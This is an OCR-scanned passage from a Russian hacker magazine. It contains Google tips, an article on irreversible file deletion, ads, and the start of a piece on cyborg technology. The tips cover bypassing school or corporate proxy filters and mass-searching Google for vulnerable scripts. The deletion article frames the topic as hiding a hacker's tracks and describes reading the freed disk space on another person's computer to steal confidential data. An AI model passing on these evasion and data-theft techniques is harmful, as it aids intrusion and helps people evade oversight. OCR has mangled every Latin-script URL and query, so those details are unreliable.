веб-страниц» 



П ВСПОМОГАТЕЛЬНЫЙ ПРОКСИ-СЕРВЕР 

Привыкшим к безлимитному интернету и 
всеобщей дозволенности по части кон- 
тента бывает очень обидно сталкиваться с 
серьезными ограничениями корпоративных 
прокси-серверов. В той же самой школе или 
университете. Если администратор фильтрует 
запросы по черному списку, в который входят 
запретные домены, это легко обходится с 
помощью следующего запроса переводчику 
боодіе: 

тш. доодіе . сош/Цгапз1аЦе?1апдраі 

г=ги I ги&и=ѵ\Алпл/ . хакер . ги 

Тогда браузер будет обращаться к поисковой 
системе, которая в 99% случаев не заблокиро- 
вана, и уже через нее получать нужный контент. 
Указанная в параметрах пара языков «ги | ги» 
говоритотом, что переводить содержимое 
нужно с русского на русский, то есть фактичес- 
ки оставить все без изменений. Само собой, 
вместо русского можно использовать любой 
другой язык. 



лен но стоит попробовать еще одну дополни- 
тельную феньку — СМаіІ Огіѵе [ ѵѵѵѵѵѵ.ѵікзое. 
сІк/сосІе/дтаіІ.Ыт ). В то время как Ѳоодіе 
выделяет на каждый етаіі-аккаунт более 2 Гб 
дискового пространства, бтаіі Огіѵе позво- 
ляет использовать его как свой собственный 
диск. После установки проги, в системе по- 
является еще один диск, который полностью 
аналогичен всем остальным. Разница лишь 
в том, что его файл ы физически хранятся в 
интернете. 

1І ОНЛАЙН-ФОТОАЛЬБОМ 

С помощью бесплатного аккаунта на 
рісаваѵѵеЬ. доодіе .сот можно выложить в инет 
1 Гб фотографий. Очень неплохо для сервиса, 
который позволяет не только удобно закачи- 
вать, но и в офигенной форме просматривать 
изображения. Еще одна разработка от боодіе 
— оффлайн-программа Рісаза — поможет 
быстро найти, отредактировать и залить в 
инет фотографии ствоего винта. Каждый раз 
при запуске Рісаза автоматически определяет 
местоположение фотографий (даже тех, о ко- 



V ВЗЛОМЩИКИНТЕРНЕТА 

Тебе наверняка не надо рассказывать, что 
боодіе — это идеальное средство для массо- 
вого поиска уязвимых сценарий. 

Во всех красках этот процесс описал Форб в 
статье «боодіе- баск для маленьких» 
[ ѵѵѵѵѵѵ.хакер.ги/тадагіпе/ха/О 76/056/1 .азр ). 
бднако получив пару тысяч страниц с ре- 
зультатами поиска, не спеши сразу кидаться 
в бой. Просматривать эти километровые 
страницы с огромным количеством не- 
нужной информации — занятие довольно 
утомительное. Зато с помощью таких утилит, 
как иШ_доод1е или доодіег, можно вытащить 
из нихтолько то, что требуется, — ссылки. 

А дальше ты волен делать что хочешь: либо 
обрабатывать их вручную, либо скормить са- 
мописному скрипту или программе, которая 
все будет делать за тебя. Кстати говоря, по 
адресу ШрѴ/щЬппѵ.іЬаскзІиІГсот/іпсІех. 
рбр?тосІиІе=ргосІгеѵіеѵѵ5 собрана огромная 
коллекция запросов, с помощью которыхты 
сможешь искать дырявые скрипты. Думаю, 
она тебе пригодится :). 
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> Многочисленные возможности Ѳоодіе Сизіотііе 




> Ѳоодіе делаетснимокэкрана каждой просмотренной 
страницы и сохраняетего в виде резервной копии на 
случай, если исходная страница недоступна 



«Соо^іе — искаженное написание английс- 
кого слова «§оо§о1» («гугол»), используемого 
для обозначения числа, состоящего из едини- 
цы и ста нулей» 



ЖБЫСТРО ИЩЕМ МУЗЫКУ 

Используя различные модификаторы, можно довольно 
хорошо приспособить боодіе для поиска музыки. Причем 
особенно успешные результаты достигаются, когда поиск 
осуществляется по листингам открытых директорий, то 
есть папок, в которых нет Ніпп-документов для отобра- 
жения, но навалена куча файлов. Сами листинги можно 
искать по ключевым словам «іпсіех об», «Іазі тосііічесі», 
«рагепі оі» в названии (тэг <ІІІІе>) документа (с помо- 
щью модификатора іпііііе), исполнителя или песню — по 
точному совпадению (достаточно взять их в кавычки). 
Остается л ишь задать наличие на странице одного из 
музыкальных расширений (трЗІѵѵтаІодд) и исключить 
из результатов поиска все динамические и статические 
страницы (нам нужны только листинги, составленные 
веб-сервером). В конечном итоге запрос будет выглядеть 
примерно так: 

" іпсіех об" + "трЗ" + " гасИоЪеасГ' -ІіОтІ -ІіОт 
-рЪр 

Подробный мануал ты найдешь на сайте ѵѵѵѵѵѵ.деосіііез. 
сот/тѵ Ьа ъ гипз . Но чтобы не заморачиваться, рекомен- 
дую уже готовый инструмент: ѵѵѵѵѵѵ.д2р.огд быстро составит 
необходимый запрос и поможет найти нужные композиции. 

г ОСТАНОВИ ШПИОНОВ! 

Ѳоодіе Апаіуіісз ( ѵѵѵѵѵѵ.доодіе.сот/апаіѵіісз ) — это специ- 
альный сервис от Ѳоодіе, который помогает веб-мастерам 
анализировать поток посетителей их сайта. С помощью 



специального ЭаѵаЗсгірІі-сценария и кукисов он записы- 
вает самую разнообразную информацию о посетителе, 
включая его ІР-адрес. Потом по этой информации можно 
отследить очень много вещей, что, естественно, нас не 
устраивает. Поэтому, пожалуй, оставим этот сервис не у 
дел, добавив в Иозі-файл компьютера запись: 

127.0.0.1 Ѵ7ІЛГѴ7. доодІе-апаІуОісз . сош 

22, РІВЕРОХИѲООѲІ.Е 

Кажется, что Ѳоодіе выдает результаты в наиболее удобном 
виде? Ошибаешься, с помощью плагина СизіогтшеѲоодІе 
для Рігеіох ( ѵѵѵѵѵѵ.сизіотігедоодіе.сот ) реально сделать 
работу с поисковой системой еще более комфортной! 
Хочешьубрать надоедливую рекламу? Эта и еще десяток 
функций — к твоим услугам. Рекомендую также последнее 
нововведение — опцию Зігеат Ѳоодіе зеагсИ гезиіі радез, 
которая фоном подгружает результаты поиска с других 
страниц и склеивает стой, что ты просматриваешь втеку- 
щий момент. ПИ 





> ѵѵѵѵѵѵ.доодІе.ги/ 
тИ/ги/щЬз . Хочешь 
работать в Ѳоодіе? В 
Москве и Питере есть 
вакансии! 




> На самом деле, 
у Ѳоодіе'а не 22, а 
все 23 секрета. Не 
подумай, что мы что- 
то захотели от тебя 
скрыть. Напротив, 
последний секрет 
мы во всех подроб- 
ностях раскрыли в 
статье «У Ѳоодіе под 
колпаком». Сдали его 
с потрахами. 



г \ 




V 

> Все возможные 
продукты от Ѳоодіе, 
начиная от самосто- 
ятельных утилит и 
заканчивая плаги- 
нами для браузеров, 
ты обязательно 
найдешь на нашем 
□ѴѲ. 
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Пришел, увидел, наследил! 

ВСЯ ПРАВДА О НАДЕЖНОМ УДАЛЕНИИ ФАЙЛОВ 

Как удалить файл без возможности его восстановления? Существует целый арсенал как 
коммерческих, так и бесплатных утилит, предназначенных для этой цели, но качество 
удаления оставляет желать лучшего, и не нужно быть крутым специалистом, вооружен- 
ным супероборудованием, чтобы вытащить информацию, казавшуюся похороненной 
навсегда. А как быть, если под рукой нет никаких утилит, кроме штатных средств опера- 
ционной системы, а файл удалить необходимо? ! 



аждый из нас неоднократно 
испытывал потребность в удалении 
файлов (и папок) без возможности 
их дальнейшего восстановления. 
Компьютер помнит слишком много, и доверять 
ему нельзя, особенно если речь идет о работе на 
чужой машине. Установить на нее дополнитель- 
ный софт довольно проблематично, а утилит, 
предназначенных для необратимого удаления 
файла, там, скорее всего, не окажется. 

Хакеры, обитающие в сумеречной зоне (по 
ту сторону закона), относятся к группе риска, 
выживание в которой не в последнюю очередь 
зависит отумения «затиратьза собой следы», 
уничтожая все компрометирующие факты, начи- 
ная от кэша браузера и заканчивая исходными 
текстами разработанного вируса. 



По поводу необратимого удаления файлов ходит 
множество легенд и сплетен, распускаемых 
людьми, нетолько никогда не восстанавлива- 
ющими файлы, но даже незнакомыми с тем, 
кто этим занимается и каким оборудованием 
располагает. В попытке отделить вымысел от 
действительности мы и написали эту статью, 
вложив в нее свой пятнадцатилетний опыт 
восстановления данных: от магнитных лент и до 
последних моделей винчестеров с перпендику- 
лярной записью. 

□Проблемы удаления, или осколки файлов 

Как известно, при удалении файла операци- 
онная система не производитего физического 
удаления с диска, а всего лишь помечает файл 
какудаленный, высвобождая принадлежащие 



ему кластеры и соответствующую файловую 
запись. 

Небольшой ликбез. Файловой записью назы- 
вается специальная структура, описывающая 
атрибуты файла (имя, дату и время создания/ 
последнего доступа/модификации), а также схе- 
му размещения кластеров на диске. Кластером 
называют группу смежных секторов, с которой 
файловая система оперирует как с единым 
целым, то есть если кластер заполнен хотя бы на 
один байт, он считается заполненным цели- 
ком. Сектором же, в свою очередь, называют 
минимальную порцию информации, с которой 
жесткий диск оперирует как с единым целым. 
Файловая система ЫТР5 (поддерживаемая 
ѴѴіпсіоѵѵб ІМТ/2000/ХР) позволяетустанавливать 
размер кластера в 51 2 байт, что соответствует 
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> Несколько бордовых квадратиков в начале диска — используемые записи $МРТ-файла, 
а желтое «поле» за ним — зарезервированное пространство, которое выделяется в общее 
пользованиетолько при заполнении диска более чем на 90% 



длине сектора. При этом потери дискового про- 
странства в незаполненных хвостах кластеров 
сводятся к минимуму, но вместе с тем растет 
фрагментация, вызывающая значительное па- 
дение производительности. Файловые системы 
ІІКІІХ'а в этом смысле намного более продви- 
нуты и активно используют деление кластера 
на зоны, убивая одним выстрелом двух зайцев: 
уменьшая фрагментацию и сокращая потери 
дискового пространства. 

Впрочем, мы отвлеклись. Вернемся кнашим 
баранам. Послеудаления файла, принадлежа- 
щие ему кластеры возвращаются в пул свобод- 
ного пространства, откуда его черпают вновь 
создаваемые иувеличивающиеся в размерах 
файлы, постепенно затирающие содержимое 
своих предшественников. Однако стратегия 
выделения свободного пространства построена 
так, что удаленный файл может валяться на 
диске годами. Даже если до отказа забить диск 
всяким зІиіТом (типа музыки или видео), это 
все равно не гарантирует полного затирания 
удаленного файла. Почему?! Да потому, что если 
размерзаписываемого файла не кратен длине 
одного кластера, то хвост кластера остается не- 
затертым! Конечно, крошечный обрывокфайла 
— это уже не весь файл, но иногда хватает и его 
(особенно если он содержит номера телефонов, 
банковскихсчетов, ит.д.). 

Утилиты, предназначенные для необрати- 
мого удаления файлов (с общим названием 



«шредеры» отанглийского «зИгесІсІіпд» 

— «резание», «кромсание»), в большинстве 
своем анализируют файловую запись, находят 
кластеры, принадлежащиеудаляемому файлу, и 
многократно перезаписывают их на секторном 
уровне специальными последовательностями 



байт, максимальнозатрудняющими восстанов- 
ление данных. 

Необходимость (и целесообразность) много- 
кратной перезаписи мы рассмотрим во врезке 
«Искусство затирания», а сейчас обратим 
внимание на то, что операционные системы се- 
мейства ІЧТ/ІІЫІХ предоставляют доступ кдиску 
на секторном уровнетолько администраторам. 
Это ограничение можно обойти, установив 
специальный драйвер (например, А5РІ32 от 
компании Абаріес), но установка драйвера 
также требует прав администратора, и на чужом 
компьютере выполнить ее, скорее всего, не 
удастся. 

Хуже того, работа с диском на секторном уровне 
требует хорошего знания всех особенностей 
файловой системы, которая меняется от версии 
к версии, в результате чего существует риск 
потери всего дискового тома, превращающий 
шредеры в потенциальные диск-дестроеры! Ну 
и комутакоеудаление нужно?! 

К тому же шредеры обычно не обращают внима- 
ния на файловую запись, оставляя нетронутыми 
имя файла, его длину, дату создания/модифика- 
ции/последнего обращения и прочие атрибуты, 
раскрытие которых может иметь далеко идущие 
последствия, особенно если файл назывался 
1 2-уо-а5Іап-даІ-бискесІ-Ьу-Ыаск-га різіз.аѵі. 

Еще один тонкий момент. Файловая система 
ЫТР5 поддерживает два типа файлов: резидент- 
ные и нерезидентные. Нерезидентныехранятся в 
кластерах на диске (и таких файлов большинство), 
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>На дискеты 
найдешь несколько 
полезных шредеров, 
а также бесплатный 
для граждан ХІІ55Р 
файловый менеджер 
ЕАР. Последний, 
кстати говоря, может 
заменить собой 
с десяток других 
полезных утилит. 




а резидентные размещаются прямо внутри файловой запи- 
си, что ускоряет до ступ кфайлу, но при этом размер файла не 
должен превышать размер хвоста файловой записи, обычно 
составляющий 1 -2 килобайт. Причем если файл был создан 
как резидентный, а затем увеличиваетсвою длину, файловая 
система превращаетего в нерезидентный, но неудосужи- 
вается подчистить резидентную копию, которая останется 
болтаться в файловой записи даже после ее удаления. 
Естественно, файловые записи, принадлежащие удаленным 
файлам, освобождаются, повторно используясь при созда- 



Важно не забывать о файловых атрибутах. После затирания 
файла нулями необходимо переименовать его случайным 
именем максимально возможной длины (для ѴѴІпбоѵѵз 
это 256 символов вместе с путем), чтобы гарантированно 
затеретьхвост старого, затем усечь длину файла до нуля и 
закрыть его. Затем открыть, записать 51 2 байт нулей (для 
затирания резидентной части) и вновьзакрыть. Потом опять 
открыть, дописать еще 51 2 байт и делатьтакб раз, пока файл 
гарантированно не превратится в резидентный, после чего 
его можно смело удалять. Пустьтеперь кто-нибудь попытает- 



ВОЗМОЖНО, МИНИСТЕРСТВО ОБОРОНЫ США И РАСПО- 
ЛАГАЕТ ПОДОБНОЙ ТЕХНИКОЙ, ТЩАТЕЛЬНО СКРЫВАЯ 
ЕЕ СУЩЕСТВОВАНИЕ ОТ НАРОДА, НО В ОБЩЕМ СЛУЧАЕ 
ВОССТАНОВЛЕНИЕ ДАННЫХ ДАЖЕ ПОСЛЕ ОДНОКРАТНОЙ 
ПЕРЕЗАПИСИ НЕВОЗМОЖНО! 







> ѵѵѵѵѵѵ.асгопІ5.ги/ 

епіегргізе/ргосіисіз/ 

ргіѵасѵехрегі 

— Асгопіз Ргіѵасу 
ЕхрегіЗиііе; 
уууууу.гефзо^.сот 

— ПесШіЛ; 
ѵѵѵѵѵѵ.іебсо.сот 

— ВСѴѴІре. 



нии новых файлов. Но если файловая запись, содержащая 
незатертую копию резидентного файла, выделяется нере- 
зидентному файлу, резидентная копия остается в целости и 
сохранности! 

Вот, оказывается, какое непростое дело — удаление файлов. 
Хотя если как следует разобраться и раскинуть мозгами, 
расширив свое сознание до границ адресного пространства 
64-разрядных процессоров, станетясно, что спускаться 
на секторный уровень совершенно необязательно и того 
же самого эффекта можно добиться путем перезаписыва- 
ния файлов через стандартные функции ввода/вывода. 
Достоинства этого подхода в том, что он работаете любой 
файловой системой, нетребует наличия прав администра- 
тора, абсолютно безопасен в плане разрушения дискового 
тома и т.д. и т.п. 



ся восстановить хотя бы кусочекданных! А ведь восстановит, 
гад! А все потому... 

Авсе потому, что мы совершеннозабыли о копиях файла, 
которые создают многие программы каквтекущем каталоге, 
так и в каталогах, обозначенных в переменных окружения 
ТЕМР/ТМР. Аесли за время своего существования файл 
менял размер, увеличиваясь или сокращаясь, на диске 
останется множество следов, которые при затирании файла 
останутся нетронутыми! Дефрагментаторы, перемещая 
файл с одного места на другое, могут оставлять множество 
осколков, зачастую расположенных весьма упорядоченным 
образом (очень часто дефрагментатор сначала собирает 
файл по кусочкам в свободном месте, а затем копирует его на 
новое место обитания). 

Избавиться же от осколков очень сложно. Забивание диска 
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файлами с размером, кратным 512 байтам, чтобы 
гарантированнозатереть все хвосты секторов, нетолько 
трудоемко, но еще и нецелесообразно. При форматиро- 
вании дискового тома файловая система ЫТЕ5 резер- 
вирует для $МРТ-файла (скрытого служебного файла, 
предназначенного для хранения файловыхзаписей) 
10% от его объема для предотвращения его фрагмента- 
ции. Однако, по мере исчерпания свободного про- 
странства, половина оставшегося резерва высвобож- 
дается в пул общего пользования. Затем (при нехватке 
пространства) — еще половина. И так продолжается до 
тех пор, пока резерв полностью не истощится. 

Ок, дискдо отказа забит файлами, что же происходит 
после ихудаления? Резерв не пополняется, $МРТ- 
файл оказывается фрагментирован, и при дальней- 
шем использовании диска эта фрагментация будет 
неуклонно нарастать, вызывая существенное падение 
производительности. То есть если ЫТРЗ-том хотя бы 
однажды был заполнен более чем на 90%, $МРТ-файл 
с высокой степенью вероятности фрагментирован. 
Причем ни один известный нам дефрагментатор не 
может собрать его по частям в единое целое (О&О 
йеігад Р го утверждает, что умеет это делать, но со 
своей работой не справляется). 

Таким образом, для сохранения прежней произ- 
водительности следует всегда оставлять хотя бы 
10% емкости І\ІТР5-тома. С другой стороны, если 
диск никогда не заполнялся более чем на 90%, то 
в зарезервированной под $МРТ области никаких 
осколков удаляемого файла заведомо не окажется! 

Но чтобы удалить файл наверняка, диск все-таки 
приходится заполнять до отказа. Иначе нельзя. Какже 
тогда бороться с фрагментацией?! Нет ничего проще! 
Создаем огромное количество (несколько тысяч и 
больше) файлов нулевого размера, для хранения 
каждого из которых расходуется одна файловая за- 
пись, расположенная в$МРТ. Затем забиваем диск до 
отказа файлами, размер которых кратен 512 байтам и 
превышает4 Кб, чтобы они не оказались резидентны- 
ми. Дождавшись исчерпания дискового пространства, 
удаляем все файлы, освобождая принадлежащие им 



записи в $МРТ. Другими словами, создание файлов 
нулевой длины увеличивает размер $МРТ-файла до 
его фрагментации, а поскольку при удалении файлов 
усечения размеров $МРТ не происходит, он остается 
нефрагментированным, если, конечно, не был уже 
фрагментирован ранее. 

Кстати говоря, на языке Си несложно написать 
программу, открывающую файл на запись и позици- 
онирующую указатель на величину, равную размеру 
свободного пространства. Теперь, если закрыть файл, 
мы сможем прочитать все, что находилось на диске (в 
том числе и содержимое ранее удаленных файлов!). 
Хорошийтрюкдля похищения конфиденциальной 
информации с чужих компьютеров, не правда ли? 
Особенно в свете того, что он нетребует прав админис- 
тратора и работаете любой операционной системой, 
будьто І_іпих, ѴѴІпсІоѵѵз или ВЗй. Соответственно, если 
забить этот файл нулями, мы очистим все дисковое 
пространство. Или практически все. Оста нуте я только 
хвосты кластеров, принадлежащие еще не удаленным 
файлам, и резидентные копии внутри $МРТ. Ксожале- 
нию, на прикладном уровне их удалить невозможно, но 
ведь не спускаться же на уровень голых секторов?! 
Существует хитрый трюк, позволяющий очистить хвосты 
и на прикладномуровне. Перебираем всефайлы одинза 
другим. Если размер файла не кратен размеру кластера 
(или 51 2 байтам, как наименьшей возможной длине), от- 
крываем его на запись, дописываем в хвост нули, а затем 
усекаем до прежнего размера. Естественно, заблокиро- 
ванныефайлы (файл подкачки, реестр)таким образом 
обработать не получится, во всяком случае без загрузки 
сдругого носителя (ЫѵеСО или второго жесткого диска). 
Конечно, загрузка с ЕіѵеСО напрягает, но это все-таки 
не секторный уровень, на котором рискугробить весь 
дисковыйтом целиком слишком велик. 

□ Практические 

советы по удалению файлов 

Ладно, оставимтеорию и перейдем кпрактике. В 
ЕАР'е для необратимого удаления файлов доста- 
точно нажать <АЕГ-ОЕЕ>, при этом ЕАР забьет файл 




Оптические диски, 
дискеты и аксессуары 



Акция проводится 
с 1 апреля по 31 июля 2007 г. 
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5таг(Виу объявляет КОНКУРС 

на лучшую работу из твоего 
собственного архива. Размести 
на сайте БтагіВиу интересные 
фотографии, коллаж или рисунок - 
и ты сможешь выиграть один 
из суперпризов или получить 
поощрительный приз от 
БтаПВиу. 

ОЦЕНИВАЮТ РАБОТЫ 
ПОСЕТИТЕЛИ САЙТА! 



Голосуй или 
проиграешь! 
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Искусство затирания 

Интуиция подсказывает: чем большее коли- 
чество раз перезаписано содержимое сек- 
тора, тем труднее его восстанавливать. Со- 
гласно стандарту 5220.22 ( ШрУ/еп.ѵѵікіресІіа. 
огд/ѵѵі кі/РО Р 5220.22- М І. подготовленному 
Министерством обороны США (ІІпііеб Зіаіев 
Оерагітепі; оі" Ребепзе) , удаляемый файл 
должен быть перезаписан как минимум 
трижды. В противном случае данные могут 
быть восстановлены за счет остаточного на- 
магничивания и вихляний магнитной головки 
вдоль дорожки. 

В народе ходят легенды о существовании ап- 
паратуры, восстанавливающей файлы даже 
после нескольких циклов перезаписи, однако 
не известно ни одного прецедента восстанов- 
ления файла по остаточной намагниченнос- 
ти. Теоретически такая операция можетбыть 
осуществлена с помощью сканирующегозон- 
дового микроскопа, процесс работы которого, 
кстати, подробно описан в статье «Методы 
сканирующей зондовой микроскопии для 
исследования поверхностей накопителей 
информации и восстановления данных» 
[ ѵѵѵѵѵѵ.ероз.кіеѵ.иа/риЬв/зрпп.Ыіт ). Однако, 
учитывая плотность записи современных 
носителей, выудить полезную информацию 
таким образом невозможно. Сканирующий 
микроскоп — это что! К нему еще потребуется 
прикрутить анализатор прочитанной инфор- 
мации, учитывающий систему модуляции 
конкретной модели жесткого диска, алгоритм 
кодирования битов, механизмтрансляции 
секторов и кучу всего... 

Возможно, Министерство обороны СШАи 
располагает подобной техникой (хоть это и 
мало вероятно), тщательно скрывая ее сущес- 
твование от народа, но в общем случае вос- 
становление данных даже после однократной 
перезаписи невозможно! Однозначно! За это 
не возьмется ни одна фирма, специализиру- 
ющаяся на спасении информации. Исклю- 
чения составляют случаи, когда данные 
вытягиваются из незатертых копий файлов, 
разбросанных по всемудисковому про- 
странству. Но костаточному намагничиванию 
это никакого отношения не имеет, поэтому бу- 
дем считать, что вопрос о количестве циклов 
перезаписи закрыт раз и навсегда. Однократ- 
ной перезаписи вполне достаточно! 

нулями, после чего переименуетего в случайно 
сгенерированное имя, усечет длину до нуля и 
благополучноудалитего с диска. В большинс- 
тве случаев этого более чем достаточно, однако 



> Дефрагментатор О&О йеітад Ргоза работой 



следует помнить, что на диске могут оставаться 
неудаленные копии файла, и для надежности 
желательно забить все свободное пространс- 
тво по методике, описанной выше. 

Полная дефрагментация также затирает все 
неудаленные копии, однако тот дефрагмента- 
тор, что входит в штатный комплект поставки 
ѴѴіпсіоѵѵб 2000/ХР, для этой цели категорически 
не годится, поскольку дефрагментируетлишь 
наиболее фрагментированные файлы и не из- 
меняет положения остальных. Дефрагментатор 
О&О йеітад Рго поддерживает несколько стра- 
тегий дефрагментации, позволяя упорядочи- 
вать файлы по дате, типу и времени последнего 
доступа. Достаточно очевидно, что если мы 
сначала выберем стратегиюупорядочивания 
файлов потипу/имени, а затем — по времени 
доступа, то дефрагментатор совершит множес- 
тво перемещений файлов, в результате чего 
все осколки ранее удаленных файлов с высо- 
кой степенью вероятности окажутся затертыми. 
И хотя некоторый шанс на их восстановление 
все-таки есть, в обыденной жизни им можно 
пренебречь. 

Также полезно держать секретные файлы в 
сжатом состоянии («Файл -> Свойства -> Ат- 
рибуты Другие Сжимать содержимое для 
экономии места на диске»). Это сделает не- 
возможным прямой секторный поискосколков 
файла по его содержимому. С другой стороны, 
при затирании сжатого файла нулями реально 
затирается лишь небольшая часть, поскольку 
нули оченьхорошосжимаются.такчто, прежде 
чем нажимать <АИ;-ОеІ> в РАП'е, следует 



обязательно сбросить атрибут сжатия. 

А вот атрибут шифрования лучше всего не 
использовать, поскольку ключ шифрования 
хранится вучетной записи пользователя, или, 
попросту говоря, в реестре, при разрушении 
которого (равно как и при переустановке 
операционной системы с нуля) зашифрован- 
ные файлы оказываются недоступными. И хотя 
существуют утилиты, подбирающие ключ шиф- 
рования за разумное время, от применения 
атрибута шифрования лучше воздержаться, а 
если шифрование все-таки необходимо, ис- 
пользовать утилиты сторонних разработчиков, 
недостатка в которых нет. 

Где еще могутхраниться удаленные файлы? 
Прежде всего, в файле подкачки. Ведь при 
любом действии сфайлом (открытии/копиро- 
вании), он загружается в оперативную память, 
а оттуда с некоторой вероятностью попадает 
в файл подкачки, который закрыт для записи 
даже администратору. Правда, загрузившись 

>Установка атрибута сжатия 
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>Папка Ресепіхранитимена последних отрытыхфайлов 



с другого носителя, мы можем нажать <АІ_Т-ОЕІ_> 
в РАР'е и без доли сомнения удалить этот файл к 
чертям. Волноваться не стоит — при следующей 
загрузке операционная система его создаст заново. 
Также можно запустить прожорливое приложение, 
поглощающее всю свободную память. 

Папка Ресепі в Боситеп^з апб БеШпдз хранит 
имена последних открываемых документов, и хра- 
нит она их много. Аналогичным образом поступает 
и РАР, сохраняя список последних копируемых 
файлов в реестре, в ветке РАР. Конечно, имена 
файлов — это еще не сами файлы, но в некоторых 
случаях знания имени файла вполне достаточно 
если недля вынесения приговора, то для порчи 
репутации. 

ООбзор шредеров 

Асгопіз Ргіѵасу Ехрегі: 5иіІе 9.0 — продвинутый 
коммерческий шредер, работающий на сектор- 
ном уровне и поддерживающий практически все 
системы линейки ѴѴі псіоѵѵз. Имеет богатый ассор- 
тимент методов необратимого удаления данных, 
реализуя следующие национальные стандарты: 
Вой 5220.22-М, ЫАѴ50 Р-5239-26/РЩ ЫАѴ50 
Р-5239-26/МРМ (американские), Ѵ5ІТР (немец- 
кий), ГОСТ Р50739-95 (отечественный), а также 
ряд нестандартных алгоритмов: метод Питера 
Гутмана (35 проходов), метод Брюса Шнайера 
(7 проходов) и некий «простой, но эффективный в 
большинстве случаев быстрый метод». Ни в одном 
из этих методов очистка файловых записей в $МРТ 
и подчистка кластерных хвостов не выполняется, и 
возникает дурацкий вопрос, какого черта елозить 
головкой целых 35 проходов, когда рядом лежат 
нетронутые осколки неудаленных данных?! Ктому 
же Асгопіз печально известен своими конфлик- 
тами как с программным, там и с аппаратным 
обеспечением. 



РесІВиІ — условно бесплатная программа, представ- 
ляющая собой довольно навороченное средство для 
предотвращенияутечекинформации иумеющая (в 
том числе) необратимо удалять файлы, если, конеч- 
но, верить разработчикам. Однако о полной очистке 
дискового пространства от возможных осколков 
РесІВиІ незаботится, а потому восстановление 
информации оказывается нетолько возможным, но и 
тривиальным. Достаточно запустить любой дисковый 
редактор — и вперед! Желающие познакомиться с 
этим «добром» могут посетить сайт ШрУЛіеразз. 
сот.ги/сІоѵѵпІоасІ.Ыпп . заплатить $20 за «офисную» 
версию или $140 за «профессиональную», получив 
в результате ту же самую надежность, которую дает 
бесплатный (для граждан СНГ) РАР по <АИ>БеІ>. 
ВСѴѴІре от компании Зеіісо — довольно известная 
утилита, выпущенная для всего зоопарка опе- 
рационных систем, от древней ѴѴІ псіоѵѵз 3.1 и до 
І_іпих. ВСѴѴІре придерживается американского 
стандарта Вой 5200 .28-5Ю , однако чисткой хвостов 
не занимается, со всеми вытекающими отсюда 
последствия. 

□ Заключение 

Нам не известен ни один готовый шредер, уда- 
ляющий файлы без возможности их полного или 
частичного восстановления за разумное время 
и при наличии доступных программных средств 
типа дискового редактора. Невероятно, но факт 
(вещь упрямая)! Тем не менее, эту операцию 
легко осуществить по вышеописанной мето- 
дике своими собственными руками и хвостом. 
Подчеркиваем еще раз: проблема необратимого 
удаления файлов чаще всего возникает при 
работе на чужом компьютере, на котором у нас 
нет ни прав администратора, ни возможности 
устанавливать какое бы то ни было программное 
обеспечение. □С 




пришли 

5 разных изображений 
животных с любых 
упаковок с дисками 
ЗтагіТгаск 

и выиграй 

один из суперпризов 




Каждый участник акции гарантировано 
получает брелок-фонарик. 



Письма с обязательным указанием ФИО, 
номера телефона и обратного адреса 
(индекс обязателен) необходимо направлять 
по адресу: 123007, г. Москва, а/я 17 

с пометкой «Сезон охоты» 

Внимание! 

На полиграфии для банок 2 изображения 
животного, поэтому ты можешь обмениваться 
одним из них со своим другом или знакомым. 
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мертв обсуждать бессмысленно. 
Запах горелого белка тоже — это 
практически синоним смер- 
тельной опасности для любого 
белкового организма. Зато вот маленькие 
зеленыеалиены с Марса — это оченьсерьезная 
тема, требующая детального рассмотрения! Она 
включает в себя кучу всевозможных составляю- 
щих: отненависти к хуту или тутси до антисеми- 
тизма или драки на овощном базаре. Человек 
боится незнакомого и чужого ровно до тех пор, 
пока не убедится в том, что от него не исходит 
опасность или что у чужака есть слабые места, 
но редко рискует проверить это самостоятельно. 
Следуетзаметить, что марсиане и африканские 
племена — цветочки. Племена вооружены 
устаревшими АК47 и пулеметами Вгеп времен 
Второй мировой — при необходимости хватит 
пары дней работы авиации, чтобы разогнать 
их. С алиенами ситуация тоже под контролем: 
астрономы предлагают премию за идею о том, 
как избавиться отастероида, который прилетит 
примерно через 100 лет. Озеленых монстрах 
— ни гу-гу, значит, они тоже пока не угрожают 
Человечеству. 

Однако Врагсреди нас. Пока он неопасный и 
проявляет себя только в недрах лабораторий. 



Это те самые Огромные Человекоподобные Ро- 
боты, о которых обмолвился президент во время 
телевизионного «общения с народом» всего 
полгода назад. При всей комичности ситуации 
нужно помнить, что многие катастрофы мира 
происходили именно из-за того, что люди не 
спешили обращать внимание на мелочи. 

□ «Мозги... нам нужны мозги!» 

(с) «Живые мертвецы» 

В настоящий момент все компьютеры и гаджеты 
имеюттак называемые «устройства ввода». 
Неважно, что это: клавиатуры, мышь, джойстик 
ит.п. Практически все они требуют мышечного 
усилия, чтобы посредством кнопки, колесика 
или рычажка передать необходимую инфор- 
мацию устройству. Очевидно, что это архаика. 

В то время как компьютер считает мегагерцы 
сотнями, человек не в состоянии достигнуть 
реакции мышц и в 5 Гц. Среднестатистический 
человектратит около 0,3 секунды на то, чтобы 
«продумать» и выполнить движение. Это запаз- 
дывание обусловлено конечной, весьма низкой 
скоростью передачи сигнала между нейронами 
головного мозга и периферии. 

Строго говоря, нейрон — это нервная клет- 
ка, через которую передается информация 



в организме. Она представляет собой, по 
сути, единицу нервной системы человека и 
животных. При достижении порогового уровня 
возбуждения, поступающего в нейрон из разных 
источников, он генерирует разряд, называемый 
потенциалом действия. Какправило, нейрон 
должен получить много приходящих импульсов, 
прежде чем в нем возникнет ответный разряд 
— отсюда и задержка. Все контакты нейрона 
(синапсы) делятся на два класса: возбудитель- 
ные и тормозные. Активность первых увеличи- 
вает возможность разряда нейрона, активность 
вторых — снижает. Ответ нейрона на активность 
всех его синапсов представляет собой результат 
своеобразного «химического голосования». 
Частота ответов нейрона зависит оттого, с какой 
периодичностью и интенсивностью возбужда- 
ются его синаптические контакты, но и здесь 
естьсвои ограничения. Генерация импульсов 
(спайков) делает нейрон недееспособным 
примерно на 0,001 с. Этот период называется 
рефрактерным, он нужен для восстановления 
ресурсов клетки. Период рефрактерности огра- 
ничивает частоту разрядов нейронов, которая 
колеблется в широких пределах: по некоторым 
данным отЗОО до 800 импульсов в секунду. 
Очевидно, что было бы неплохо избавиться 
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□ « Из этих я и ц в ы л у п л я ются га н гл ы » 

(с) какой-то трэшевый фильм 

Пока СМИ заметили только две разработки, 
связанные с реальной «технологией киборгов». 
Обе связаны с медицинскими исследованиями 
и предназначены для замены ампутированных 
конечностей. 

Шотландцы впервые реализовали полно- 
ценную систему приводов, которыеуправ- 
лялись при помощи сигналов, снимаемых с 
нервных окончаний. Искусственную конеч- 
ность получил доброволец Кэмпбелл Эйрд, 
